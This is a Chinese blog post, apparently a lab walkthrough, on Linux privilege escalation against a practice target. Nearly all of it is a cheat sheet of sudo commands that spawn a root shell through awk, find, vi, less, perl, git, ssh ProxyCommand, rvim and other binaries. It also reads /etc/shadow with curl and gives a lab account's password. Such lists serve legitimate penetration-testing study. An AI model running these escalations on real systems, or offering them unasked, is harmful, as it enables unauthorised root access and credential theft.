前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Linux下提权(基于靶场)

Linux下提权(基于靶场)

作者头像
网e渗透安全部
发布2023-02-25 13:42:51
4.4K1
发布2023-02-25 13:42:51
举报
文章被收录于专栏:白安全组

环境配置

这里使用靶场linusec

登录账号密码:

代码语言:javascript
复制
账号:bob 密码:secret

这里是普通权限用户

这里假定kali拿到了普通用户权限

kali连接ssh靶机

代码语言:javascript
复制
ssh bob@[目标ip]

密码

代码语言:javascript
复制
secret

ash也是一种shell,占用资源很少的,管理员可能开启

代码语言:javascript
复制
sudo ash

awk是一个强大的文本分析工具

代码语言:javascript
复制
sudo awk 'BEGIN {system("/bin/sh")}'

使用这个命令可以直接提权到root

代码语言:javascript
复制

bash提权
bash
sudo bash

csh同样是一种shell

代码语言:javascript
复制
sudo csh

curl 提权

代码语言:javascript
复制
sudo curl file:///etc/shadow

dash 一些小型设备可能安装

代码语言:javascript
复制
sudo dash

ed 文本编辑器,一次只能编辑一行

代码语言:javascript
复制
sudo ed
代码语言:javascript
复制
!/bin/sh

env查询环境变量,可以查询环境变量的时候执行一下bin/sh文件

代码语言:javascript
复制
sodu env /bin/sh

expect自动化交互套件,执行程序的时候可以交互

代码语言:javascript
复制
sudo expect -c 'spawn /bin/sh;interact'

find 指定查找文件

代码语言:javascript
复制
sudo find . -exec /bin/sh \; -quit
代码语言:javascript
复制
ftp
代码语言:javascript
复制
less /etc/passwd

读取文件时执行文件sh

代码语言:javascript
复制
!/bin/sh

sudo man man man命令的详细解释 man命令是Linux下的帮助指令,执行两次出现问题后输入下面的代码读取使用bin/sh

代码语言:javascript
复制
! /bin/sh

socat 也是一个多功能网络工具

代码语言:javascript
复制
sudo socat stdin exec:/bin/sh

ssh命令

代码语言:javascript
复制
sudo ssh -o ProxyCommand=' :sh 0<&2 1>&2' x
代码语言:javascript
复制
vi 
sudo vi -c ':!/bin/sh' /dev/null

zsh也属于shell中的一种,有一些Linux中会使用

代码语言:javascript
复制
sudo zsh

pico用来编辑文本文件的

代码语言:javascript
复制
sudo pico
^R^X
reset; sh 1>&0 2>&0

rvim 改进版的vi

使用rvim加上python3执行命令

代码语言:javascript
复制
sudo rvim -c ':python3 import os; os.execl("/bin/sh","sh","-c","reset; exec sh")'

perl 环境

代码语言:javascript
复制
sudo perl -e 'exec "/bin/sh";'

tclsh 脚本语言

代码语言:javascript
复制
sudo tclsh
exec /bin/sh <@stdin > @stdout 2>@stderr

git 提权 开源封闭的程序管理系统

代码语言:javascript
复制
sudo git -p help config
! /bin/sh
代码语言:javascript
复制


script 
sudo script -q /dev/null

taskset 设置线程的命令,可以把命令绑定到特定的cpu运行

代码语言:javascript
复制
sudo taskset 1 /bin/sh -p

密码破解

代码语言:javascript
复制
cat /etc/passwd
代码语言:javascript
复制
insecurity 密码P@ssw0rd
代码语言:javascript
复制
su insecurity

切换到这个用户权限

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2022-11-30,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 白安全组 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档